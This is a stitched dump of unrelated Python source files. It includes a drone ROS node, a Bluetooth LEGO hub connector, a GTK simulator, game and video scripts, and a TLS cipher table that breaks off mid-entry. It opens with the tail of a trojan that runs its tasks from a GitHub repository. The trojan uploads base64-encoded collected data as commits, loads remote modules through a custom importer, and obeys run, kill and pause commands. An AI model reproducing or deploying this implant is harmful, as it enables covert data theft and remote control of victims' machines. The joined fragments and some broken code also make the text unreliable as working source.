remote_path = "data/%s/%s_%s.data" % (trojan_id, module, date)
commit_message = "Upload Data: %s_%s from ID: %s" % (module, date, trojan_id)
repo.create_file(remote_path,commit_message,base64.b64encode(data))
return True
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
store_module_result(result)
return
# !------ Main Loop ------! #
sys.meta_path = [GitImporter()]
while True:
if task_queue.empty():
code_public_key=get_file_contents("config/code_key.pub")
# Check if Trojan has an unique ID
check_trojan_id()
config = get_trojan_config()
## Task = Run
if config[0]['task'] == 'run':
for task in config:
if 'module' in task:
t = threading.Thread(target=module_runner, args=(task['module'],))
t.start()
time.sleep(random.randint(1,10))
## Task = Kill
if config[0]['task'] == 'kill':
print "[!!!] Trojan kill itself"
sys.exit(1)
## Task = Pause
if config[0]['task'] == 'pause':
print "[?] Trojan is in pause mode"
task_pause = random.randint(config[0]['task_pause_min'],config[0]['task_pause_max'])
print "[*] Waiting for %s seconds" % task_pause
time.sleep(task_pause)
|
module.py
|
# tv
#
# Catbox module for playing online videos of birds and squirrels.
# Support for offline tv maybe in the future.
#
# Authors:
# Jonathon Roscoe / @jroscoe5
# Kyle Roscoe / @kroscoe45
import glob
import os
from queue import Queue
from threading import Thread
from time import sleep
from chromedriver_py import binary_path
from modules.base_module import BaseModule
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
class TVModule(BaseModule):
"""
Plays online bird and squirrel videos using chromedriver and selenium.
"""
def __init__(self) -> None:
super().__init__()
self.event_queue = Queue()
self.tv_running = False
def register(self, emitter) -> None:
super().register(emitter)
@emitter.on(self.codes['start_timed_tv'])
def start_timed_tv(duration):
self.event_queue.put(['start', duration])
@emitter.on(self.codes['stop_tv'])
def stop_tv():
self.event_queue.put(['stop', None])
def launch(self) -> None:
super().launch()
while True:
event = self.event_queue.get(block=True)
if event[0] == 'start':
self.tv_running = True
Thread(target=self.__launch_timed_tv, args=(event[1],), daemon=True).start()
self.emitter.emit(self.codes['print'], 'time for some tv!')
if event[0] == 'stop':
self.emitter.emit(self.codes['print'], 'turning off tv!')
self.tv_running = False
def __launch_timed_tv(self, duration):
"""
Navigates to a video, full screens it and then sleeps until stopped or
duration times out.
"""
extensions_folder = os.path.dirname(os.path.realpath(__file__)) + '/data'
extensions_list = glob.glob(f'{extensions_folder}/*.crx')
options = Options()
chromeOptions = webdriver.ChromeOptions()
options.add_experimental_option("useAutomationExtension", False)
options.add_experimental_option("excludeSwitches",["enable-automation"])
for extension in extensions_list:
options.add_extension(extension)
driver = webdriver.Chrome(executable_path=binary_path, options=options)
driver.implicitly_wait(10)
driver.get('https://www.youtube.com/watch?v=56359TnQGww')
sleep(5)
video_element = driver.find_element_by_id('ytd-player')
actionChains = ActionChains(driver)
actionChains.double_click(video_element).perform()
sleep(5)
video_element.click()
while (duration > 0 and self.tv_running):
sleep(1)
duration -= 1
driver.quit()
|
ticrate.py
|
#!/usr/bin/env python3
from argparse import ArgumentParser
from multiprocessing import Process
from random import choice
import os
import vizdoom as vzd
DEFAULT_CONFIG = os.path.join(vzd.scenarios_path, "basic.cfg")
def play(config_file, ticrate=35):
game = vzd.DoomGame()
game.load_config(config_file)
game.set_mode(vzd.Mode.ASYNC_PLAYER)
game.set_ticrate(ticrate)
game.init()
actions = [[True, False, False],
[False, True, False],
[False, False, True]]
episodes = 10
for i in range(episodes):
game.new_episode()
while not game.is_episode_finished():
game.make_action(choice(actions))
game.close()
if __name__ == '__main__':
if __name__ == "__main__":
parser = ArgumentParser("ViZDoom example showing how to change the ticrate for asynchronous mode.")
parser.add_argument(dest="config",
default=DEFAULT_CONFIG,
nargs="?",
help="Path to the configuration file of the scenario."
" Please see "
"../../scenarios/*cfg for more scenarios.")
parser.add_argument("-t", "--ticrates",
default=[17,35,70],
nargs="+",
help="List of ticrates to show.")
args = parser.parse_args()
processes= []
for ticrate in args.ticrates:
p = Process(target=play, args=[args.config, ticrate])
p.start()
processes.append(p)
for p in processes:
p.join()
|
form.py
|
import os
from gi.repository import Gtk, Gdk, GLib, GObject, GdkPixbuf
import math
from src.simulation import Simulation
from threading import Thread, Event
GLADE_MARKUP = 'os-simulator.glade'
class Dialog(Gtk.Dialog):
def __init__(self, parent, title, message):
Gtk.Dialog.__init__(self, title, parent, 0,
(Gtk.STOCK_OK, Gtk.ResponseType.OK))
# self.set_default_size(150, 100)
label = Gtk.Label(message)
box = self.get_content_area()
box.add(label)
self.show_all()
class OsSimulatorWindow(object):
AVG_INNER_PLOT = 'avg_inner.png'
AVG_TOTAL_PLOT = 'avg_total.png'
def __init__(self, builder):
super(OsSimulatorWindow, self).__init__()
self.builder = builder
self.builder.connect_signals(self)
self.window = builder.get_object('os_simulator_window')
self.delta_text = builder.get_object('delta_text')
self.buffer_size_text = builder.get_object('buffer_size_text')
self.buffer_latency_text = {
'min': builder.get_object('buffer_latency_min_text'),
'max': builder.get_object('buffer_latency_max_text'),
'step': builder.get_object('buffer_latency_step_text'),
}
self.gen_lambda_text = {
'min': builder.get_object('lambda_min_text'),
'max': builder.get_object('lambda_max_text'),
'step': builder.get_object('lambda_step_text'),
}
self.time_distrib_text = {
'mu': builder.get_object('solve_time_distrib_mu_text'),
'sigma': builder.get_object('solve_time_distrib_sigma_text'),
}
self.simulation_time_text = builder.get_object('simulation_time_text')
self.exp_per_conf_text = builder.get_object('exp_per_conf_text')
self.sim_finished_event = Event()
self.images_box = builder.get_object('images_box')
self.images = {
'inner': builder.get_object('avg_inner_plot'),
'total': builder.get_object('avg_total_plot'),
}
self.simulation_thread = None
self.simulation_finished = False
def show(self):
self.window.show_all()
def on_os_simulator_window_configure_event(self, *args):
if self.simulation_finished:
self._draw_images()
def on_os_simulator_window_destroy(self, *args):
if self.simulation_thread is not None:
# self.simulation_thread.stop()
pass
Gtk.main_quit(*args)
def on_simulate_button_clicked(self, *args):
try:
delta = int(self.delta_text.get_text())
buffer_size = int(self.buffer_size_text.get_text())
buffer_latency = xrange(int(self.buffer_latency_text['min'].get_text()),
int(self.buffer_latency_text['max'].get_text()),
int(self.buffer_latency_text['step'].get_text()))
gen_lambda = xrange(int(self.gen_lambda_text['min'].get_text()),
int(self.gen_lambda_text['max'].get_text()),
int(self.gen_lambda_text['step'].get_text()))
time_distrib = dict(mu=float(self.time_distrib_text['mu'].get_text()),
sigma=float(self.time_distrib_text['sigma'].get_text()))
sim_time = int(self.simulation_time_text.get_text())
exp_per_conf = int(self.exp_per_conf_text.get_text())
data = dict(delta=delta, buffer_size=buffer_size, buffer_latency=buffer_latency,
gen_lambda=gen_lambda, time_distrib=time_distrib, sim_time=sim_time,
exp_per_conf=exp_per_conf)
def target():
self.on_simulation_started()
Simulation().simulation(**data)
GLib.idle_add(self.on_simulation_finished)
self.simulation_thread = Thread(target=target)
self.simulation_thread.start()
except ValueError as e:
self.display_dialog('Error', 'Incorrect data')
print e
pass
def display_dialog(self, title, message):
dialog = Dialog(self.window, title, message)
response = dialog.run()
if response == Gtk.ResponseType.OK:
print("The OK button was clicked")
dialog.destroy()
def on_simulation_started(self):
print 'Simulation started'
self.simulation_finished = False
if os.path.isfile(self.AVG_INNER_PLOT):
os.remove(self.AVG_INNER_PLOT)
if os.path.isfile(self.AVG_TOTAL_PLOT):
os.remove(self.AVG_TOTAL_PLOT)
def on_simulation_finished(self):
print 'Simulation finished'
self.simulation_finished = True
self.display_dialog("Info", "finished")
self._draw_images()
def _draw_images(self):
rect = self.images_box.get_allocation()
width = rect.width
height = rect.height / 2
pixbuf = GdkPixbuf.Pixbuf.new_from_file(self.AVG_INNER_PLOT)
pixbuf = pixbuf.scale_simple(width, height, GdkPixbuf.InterpType.BILINEAR)
self.images['inner'].set_from_pixbuf(pixbuf)
pixbuf = GdkPixbuf.Pixbuf.new_from_file(self.AVG_TOTAL_PLOT)
pixbuf = pixbuf.scale_simple(width, height, GdkPixbuf.InterpType.BILINEAR)
self.images['total'].set_from_pixbuf(pixbuf)
@staticmethod
def _float_range(first, last, step):
eps = 0.00001
l = []
current = first
while math.fabs(current - last) >= eps:
l.append(current)
current += step
return l
if __name__ == "__main__":
GObject.threads_init()
builder = Gtk.Builder()
builder.add_from_file(GLADE_MARKUP)
window = OsSimulatorWindow(builder)
window.show()
Gtk.main()
|
node.py
|
#!/usr/bin/env python3
import pprint
import math
import rclpy
import threading
import numpy
import time
import av
import tf2_ros
import cv2
import time
import yaml
from djitellopy import Tello
from rclpy.node import Node
from tello_msg.msg import TelloStatus, TelloID, TelloWifiConfig
from std_msgs.msg import Empty, UInt8, UInt8, Bool, String
from sensor_msgs.msg import Image, Imu, BatteryState, Temperature, CameraInfo
from geometry_msgs.msg import Twist, TransformStamped
from nav_msgs.msg import Odometry
from cv_bridge import CvBridge
import ament_index_python
# Tello ROS node class, inherits from the Tello controller object.
#
# Can be configured to be used by multiple drones, publishes, all data collected from the drone and provides control using ROS messages.
class TelloNode():
def __init__(self, node):
# ROS node
self.node = node
# Declare parameters
self.node.declare_parameter('connect_timeout', 10.0)
self.node.declare_parameter('tello_ip', '192.168.10.1')
self.node.declare_parameter('tf_base', 'map')
self.node.declare_parameter('tf_drone', 'drone')
self.node.declare_parameter('tf_pub', False)
self.node.declare_parameter('camera_info_file', '')
# Get parameters
self.connect_timeout = float(self.node.get_parameter('connect_timeout').value)
self.tello_ip = str(self.node.get_parameter('tello_ip').value)
self.tf_base = str(self.node.get_parameter('tf_base').value)
self.tf_drone = str(self.node.get_parameter('tf_drone').value)
self.tf_pub = bool(self.node.get_parameter('tf_pub').value)
self.camera_info_file = str(self.node.get_parameter('camera_info_file').value)
# Camera information loaded from calibration yaml
self.camera_info = None
# Check if camera info file was received as argument
if len(self.camera_info_file) == 0:
share_directory = ament_index_python.get_package_share_directory('tello')
self.camera_info_file = share_directory + '/ost.yaml'
# Read camera info from YAML file
with open(self.camera_info_file, 'r') as file:
self.camera_info = yaml.load(file, Loader=yaml.FullLoader)
# self.node.get_logger().info('Tello: Camera information YAML' + self.camera_info.__str__())
# Configure drone connection
Tello.TELLO_IP = self.tello_ip
Tello.RESPONSE_TIMEOUT = int(self.connect_timeout)
# Connect to drone
self.node.get_logger().info('Tello: Connecting to drone')
self.tello = Tello()
self.tello.connect()
self.node.get_logger().info('Tello: Connected to drone')
# Publishers and subscribers
self.setup_publishers()
self.setup_subscribers()
# Processing threads
self.start_video_capture()
self.start_tello_status()
self.start_tello_odom()
self.node.get_logger().info('Tello: Driver node ready')
# Setup ROS publishers of the node.
def setup_publishers(self):
self.pub_image_raw = self.node.create_publisher(Image, 'image_raw', 1)
self.pub_camera_info = self.node.create_publisher(CameraInfo, 'camera_info', 1)
self.pub_status = self.node.create_publisher(TelloStatus, 'status', 1)
self.pub_id = self.node.create_publisher(TelloID, 'id', 1)
self.pub_imu = self.node.create_publisher(Imu, 'imu', 1)
self.pub_battery = self.node.create_publisher(BatteryState, 'battery', 1)
self.pub_temperature = self.node.create_publisher(Temperature, 'temperature', 1)
self.pub_odom = self.node.create_publisher(Odometry, 'odom', 1)
# TF broadcaster
if self.tf_pub:
self.tf_broadcaster = tf2_ros.TransformBroadcaster(self.node)
# Setup the topic subscribers of the node.
def setup_subscribers(self):
self.sub_emergency = self.node.create_subscription(Empty, 'emergency', self.cb_emergency, 1)
self.sub_takeoff = self.node.create_subscription(Empty, 'takeoff', self.cb_takeoff, 1)
self.sub_land = self.node.create_subscription(Empty, 'land', self.cb_land, 1)
self.sub_control = self.node.create_subscription(Twist, 'control', self.cb_control, 1)
self.sub_flip = self.node.create_subscription(String, 'flip', self.cb_flip, 1)
self.sub_wifi_config = self.node.create_subscription(TelloWifiConfig, 'wifi_config', self.cb_wifi_config, 1)
# Get the orientation of the drone as a quaternion
def get_orientation_quaternion(self):
deg_to_rad = math.pi / 180.0
return euler_to_quaternion([
self.tello.get_yaw() * deg_to_rad,
self.tello.get_pitch() * deg_to_rad,
self.tello.get_roll() * deg_to_rad
])
# Start drone info thread
def start_tello_odom(self, rate=1.0/10.0):
def status_odom():
while True:
# TF
if self.tf_pub:
t = TransformStamped()
t.header.stamp = self.node.get_clock().now().to_msg()
t.header.frame_id = self.tf_base
t.child_frame_id = self.tf_drone
t.transform.translation.x = 0.0
t.transform.translation.y = 0.0
t.transform.translation.z = (self.tello.get_barometer()) / 100.0
self.tf_broadcaster.sendTransform(t)
# IMU
if self.pub_imu.get_subscription_count() > 0:
q = self.get_orientation_quaternion()
msg = Imu()
msg.header.stamp = self.node.get_clock().now().to_msg()
msg.header.frame_id = self.tf_drone
msg.linear_acceleration.x = self.tello.get_acceleration_x() / 100.0
msg.linear_acceleration.y = self.tello.get_acceleration_y() / 100.0
msg.linear_acceleration.z = self.tello.get_acceleration_z() / 100.0
msg.orientation.x = q[0]
msg.orientation.y = q[1]
msg.orientation.z = q[2]
msg.orientation.w = q[3]
self.pub_imu.publish(msg)
# Odometry
if self.pub_odom.get_subscription_count() > 0:
q = self.get_orientation_quaternion()
odom_msg = Odometry()
odom_msg.header.stamp = self.node.get_clock().now().to_msg()
odom_msg.header.frame_id = self.tf_base
odom_msg.pose.pose.orientation.x = q[0]
odom_msg.pose.pose.orientation.y = q[1]
odom_msg.pose.pose.orientation.z = q[2]
odom_msg.pose.pose.orientation.w = q[3]
odom_msg.twist.twist.linear.x = float(self.tello.get_speed_x()) / 100.0
odom_msg.twist.twist.linear.y = float(self.tello.get_speed_y()) / 100.0
odom_msg.twist.twist.linear.z = float(self.tello.get_speed_z()) / 100.0
self.pub_odom.publish(odom_msg)
time.sleep(rate)
thread = threading.Thread(target=status_odom)
thread.start()
return thread
# Start drone info thread
def start_tello_status(self, rate=1.0/2.0):
def status_loop():
while True:
# Battery
if self.pub_battery.get_subscription_count() > 0:
msg = BatteryState()
msg.header.frame_id = self.tf_drone
msg.percentage = float(self.tello.get_battery())
msg.voltage = 3.8
msg.design_capacity = 1.1
msg.present = True
msg.power_supply_technology = 2 # POWER_SUPPLY_TECHNOLOGY_LION
msg.power_supply_status = 2 # POWER_SUPPLY_STATUS_DISCHARGING
self.pub_battery.publish(msg)
# Temperature
if self.pub_temperature.get_subscription_count() > 0:
msg = Temperature()
msg.header.frame_id = self.tf_drone
msg.temperature = self.tello.get_temperature()
msg.variance = 0.0
self.pub_temperature.publish(msg)
# Tello Status
if self.pub_status.get_subscription_count() > 0:
msg = TelloStatus()
msg.acceleration.x = self.tello.get_acceleration_x()
msg.acceleration.y = self.tello.get_acceleration_y()
msg.acceleration.z = self.tello.get_acceleration_z()
msg.speed.x = float(self.tello.get_speed_x())
msg.speed.y = float(self.tello.get_speed_y())
msg.speed.z = float(self.tello.get_speed_z())
msg.pitch = self.tello.get_pitch()
msg.roll = self.tello.get_roll()
msg.yaw = self.tello.get_yaw()
msg.barometer = int(self.tello.get_barometer())
msg.distance_tof = self.tello.get_distance_tof()
msg.fligth_time = self.tello.get_flight_time()
msg.battery = self.tello.get_battery()
msg.highest_temperature = self.tello.get_highest_temperature()
msg.lowest_temperature = self.tello.get_lowest_temperature()
msg.temperature = self.tello.get_temperature()
msg.wifi_snr = self.tello.query_wifi_signal_noise_ratio()
self.pub_status.publish(msg)
# Tello ID
if self.pub_id.get_subscription_count() > 0:
msg = TelloID()
msg.sdk_version = self.tello.query_sdk_version()
msg.serial_number = self.tello.query_serial_number()
self.pub_id.publish(msg)
# Camera info
if self.pub_camera_info.get_subscription_count() > 0:
msg = CameraInfo()
msg.height = self.camera_info.image_height
msg.width = self.camera_info.image_width
msg.distortion_model = self.camera_info.distortion_model
msg.D = self.camera_info.distortion_coefficients
msg.K = self.camera_info.camera_matrix
msg.R = self.camera_info.rectification_matrix
msg.P = self.camera_info.projection_matrix
self.pub_camera_info.publish(msg)
# Sleep
time.sleep(rate)
thread = threading.Thread(target=status_loop)
thread.start()
return thread
# Start video capture thread.
def start_video_capture(self, rate=1.0/30.0):
# Enable tello stream
self.tello.streamon()
# OpenCV bridge
self.bridge = CvBridge()
def video_capture_thread():
frame_read = self.tello.get_frame_read()
while True:
# Get frame from drone
frame = frame_read.frame
# Publish opencv frame using CV bridge
msg = self.bridge.cv2_to_imgmsg(numpy.array(frame), 'bgr8')
msg.header.frame_id = self.tf_drone
self.pub_image_raw.publish(msg)
time.sleep(rate)
# We need to run the recorder in a seperate thread, otherwise blocking options would prevent frames from getting added to the video
thread = threading.Thread(target=video_capture_thread)
thread.start()
return thread
# Terminate the code and shutdown node.
def terminate(self, err):
self.node.get_logger().error(str(err))
self.tello.end()
rclpy.shutdown()
# Stop all movement in the drone
def cb_emergency(self, msg):
self.tello.emergency()
# Drone takeoff message control
def cb_takeoff(self, msg):
self.tello.takeoff()
# Land the drone message callback
def cb_land(self, msg):
self.tello.land()
# Control messages received use to control the drone "analogically"
#
# This method of controls allow for more precision in the drone control.
#
# Receives the linear and angular velocities to be applied from -100 to 100.
def cb_control(self, msg):
self.tello.send_rc_control(int(msg.linear.x), int(msg.linear.y), int(msg.linear.z), int(msg.angular.z))
# Configure the wifi credential that should be used by the drone.
#
# The drone will be restarted after the credentials are changed.
def cb_wifi_config(self, msg):
self.tello.set_wifi_credentials(msg.ssid, msg.password)
# Perform a drone flip in a direction specified.
#
# Directions can be "r" for right, "l" for left, "f" for forward or "b" for backward.
def cb_flip(self, msg):
self.tello.flip(msg.data)
# Convert a rotation from euler to quaternion.
def euler_to_quaternion(r):
(yaw, pitch, roll) = (r[0], r[1], r[2])
qx = math.sin(roll/2) * math.cos(pitch/2) * math.cos(yaw/2) - math.cos(roll/2) * math.sin(pitch/2) * math.sin(yaw/2)
qy = math.cos(roll/2) * math.sin(pitch/2) * math.cos(yaw/2) + math.sin(roll/2) * math.cos(pitch/2) * math.sin(yaw/2)
qz = math.cos(roll/2) * math.cos(pitch/2) * math.sin(yaw/2) - math.sin(roll/2) * math.sin(pitch/2) * math.cos(yaw/2)
qw = math.cos(roll/2) * math.cos(pitch/2) * math.cos(yaw/2) + math.sin(roll/2) * math.sin(pitch/2) * math.sin(yaw/2)
return [qx, qy, qz, qw]
# Convert rotation from quaternion to euler.
def quaternion_to_euler(q):
(x, y, z, w) = (q[0], q[1], q[2], q[3])
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw = math.atan2(t3, t4)
return [yaw, pitch, roll]
def main(args=None):
rclpy.init(args=args)
node = rclpy.create_node('tello')
drone = TelloNode(node)
rclpy.spin(node)
drone.cb_shutdown()
node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
cbluepy.py
|
import logging
import re
from threading import Thread, Event
from bluepy import btle
from pylgbst.comms import Connection, LEGO_MOVE_HUB
from pylgbst.utilities import str2hex, queue
log = logging.getLogger('comms-bluepy')
COMPLETE_LOCAL_NAME_ADTYPE = 9
PROPAGATE_DISPATCHER_EXCEPTION = False
def _get_iface_number(controller):
"""bluepy uses iface numbers instead of full names."""
if not controller:
return None
m = re.search(r'hci(\d+)$', controller)
if not m:
raise ValueError('Cannot find iface number in {}.'.format(controller))
return int(m.group(1))
class BluepyDelegate(btle.DefaultDelegate):
def __init__(self, handler):
btle.DefaultDelegate.__init__(self)
self._handler = handler
def handleNotification(self, cHandle, data):
log.debug('Incoming notification')
self._handler(cHandle, data)
# We need a separate thread to wait for notifications,
# but calling peripheral's methods from different threads creates issues,
# so we will wrap all the calls into a thread
class BluepyThreadedPeripheral(object):
def __init__(self, addr, addrType, controller):
self._call_queue = queue.Queue()
self._addr = addr
self._addrType = addrType
self._iface_number = _get_iface_number(controller)
self._disconnect_event = Event()
self._dispatcher_thread = Thread(target=self._dispatch_calls)
self._dispatcher_thread.setDaemon(True)
self._dispatcher_thread.setName("Bluepy call dispatcher")
self._dispatcher_thread.start()
def _dispatch_calls(self):
self._peripheral = btle.Peripheral(self._addr, self._addrType, self._iface_number)
try:
while not self._disconnect_event.is_set():
try:
try:
method = self._call_queue.get(False)
method()
except queue.Empty:
pass
self._peripheral.waitForNotifications(1.)
except Exception as ex:
log.exception('Exception in call dispatcher thread', exc_info=ex)
if PROPAGATE_DISPATCHER_EXCEPTION:
log.error("Terminating dispatcher thread.")
raise
finally:
self._peripheral.disconnect()
def write(self, handle, data):
self._call_queue.put(lambda: self._peripheral.writeCharacteristic(handle, data))
def set_notify_handler(self, handler):
delegate = BluepyDelegate(handler)
self._call_queue.put(lambda: self._peripheral.withDelegate(delegate))
def disconnect(self):
self._disconnect_event.set()
class BluepyConnection(Connection):
def __init__(self, controller='hci0'):
Connection.__init__(self)
self._peripheral = None # :type BluepyThreadedPeripheral
self._controller = controller
def connect(self, hub_mac=None):
log.debug("Trying to connect client to MoveHub with MAC: %s", hub_mac)
scanner = btle.Scanner()
while not self._peripheral:
log.info("Discovering devices...")
scanner.scan(1)
devices = scanner.getDevices()
for dev in devices:
address = dev.addr
addressType = dev.addrType
name = dev.getValueText(COMPLETE_LOCAL_NAME_ADTYPE)
log.debug("Found dev, name: {}, address: {}".format(name, address))
if (not hub_mac and name == LEGO_MOVE_HUB) or hub_mac == address:
logging.info("Found %s at %s", name, address)
self._peripheral = BluepyThreadedPeripheral(address, addressType, self._controller)
break
return self
def disconnect(self):
self._peripheral.disconnect()
def write(self, handle, data):
log.debug("Writing to handle %s: %s", handle, str2hex(data))
self._peripheral.write(handle, data)
def set_notify_handler(self, handler):
self._peripheral.set_notify_handler(handler)
def is_alive(self):
return True
|
term.py
|
__author__ = 'Shirish Pal'
import os
import subprocess
import sys
import argparse
import json
import jinja2
import time
from threading import Thread
import pdb
import requests
supported_ciphers = [
{'cipher_name' : 'AES128-SHA',
'cipher' : '{AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '10.2',
'server_ip_prefix' : '100.2'
},
{'cipher_name' : 'AES256-SHA',
'cipher' : '{AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '11.2',
'server_ip_prefix' : '101.2'
},
{'cipher_name' : 'DHE-RSA-AES128-SHA',
'cipher' : '{DHE-RSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '12.2',
'server_ip_prefix' : '102.2'
},
{'cipher_name' : 'DHE-RSA-AES256-SHA',
'cipher' : '{DHE-RSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '13.2',
'server_ip_prefix' : '103.2'
},
{'cipher_name' : 'DHE-RSA-AES128-GCM-SHA256',
'cipher' : '{DHE-RSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '14.2',
'server_ip_prefix' : '104.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-SHA',
'cipher' : '{ECDHE-ECDSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '15.2',
'server_ip_prefix' : '105.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-SHA',
'cipher' : '{ECDHE-ECDSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '16.2',
'server_ip_prefix' : '106.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-SHA',
'cipher' : '{ECDHE-RSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '17.2',
'server_ip_prefix' : '107.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-SHA',
'cipher' : '{ECDHE-RSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '18.2',
'server_ip_prefix' : '108.2'
},
{'cipher_name' : 'ECDHE-ECDSA-CHACHA20-POLY1305',
'cipher' : '{ECDHE-ECDSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '19.2',
'server_ip_prefix' : '109.2'
},
{'cipher_name' : 'DHE-RSA-CHACHA20-POLY1305',
'cipher' : '{DHE-RSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '20.2',
'server_ip_prefix' : '110.2'
},
{'cipher_name' : 'CAMELLIA128-SHA',
'cipher' : '{CAMELLIA128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '21.2',
'server_ip_prefix' : '111.2'
},
{'cipher_name' : 'CAMELLIA256-SHA',
'cipher' : '{CAMELLIA256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '22.2',
'server_ip_prefix' : '112.2'
},
{'cipher_name' : 'DHE-RSA-CAMELLIA128-SHA',
'cipher' : '{DHE-RSA-CAMELLIA128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '23.2',
'server_ip_prefix' : '113.2'
},
{'cipher_name' : 'DHE-RSA-CAMELLIA256-SHA',
'cipher' : '{DHE-RSA-CAMELLIA256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '24.2',
'server_ip_prefix' : '114.2'
},
{'cipher_name' : 'AES128-SHA256',
'cipher' : '{AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '25.2',
'server_ip_prefix' : '115.2'
},
{'cipher_name' : 'AES256-SHA256',
'cipher' : '{AES256-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '26.2',
'server_ip_prefix' : '116.2'
},
{'cipher_name' : 'DHE-RSA-AES128-SHA256',
'cipher' : '{DHE-RSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '27.2',
'server_ip_prefix' : '117.2'
},
{'cipher_name' : 'AES128-GCM-SHA256',
'cipher' : '{AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '28.2',
'server_ip_prefix' : '118.2'
},
{'cipher_name' : 'AES256-GCM-SHA384',
'cipher' : '{AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
